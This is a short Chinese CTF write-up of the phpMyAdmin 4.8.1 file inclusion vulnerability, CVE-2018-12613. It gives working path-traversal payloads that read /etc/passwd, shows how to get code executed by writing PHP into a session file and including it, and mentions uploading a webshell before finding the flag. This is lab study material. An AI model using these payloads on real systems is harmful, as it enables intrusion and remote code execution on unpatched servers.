打开所提供的网址
是个phpmyadmin界面
phpmyadmin的版本号为4.8.1
在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章
phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
我们尝试一下任意文件包含
index.php?target=sql.php?/../../../../../../../../../etc/passwd
执行成功
写入一个phpinfo文件
SELECT '<?php phpinfo()?>'
执行成功
查看我们的session,我们输入的这一段php代码其实已经保存在服务器中了。
我们利用尝试包含session文件,出现phpinfo()。
/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c4f4559797ee11b36826474f973af72b
往下翻看到flag
这里我一开始还是直接上传了一个小马,结果蚁剑上一直没找到flag文件,后面又翻了phpinfo的页面才查看到的flag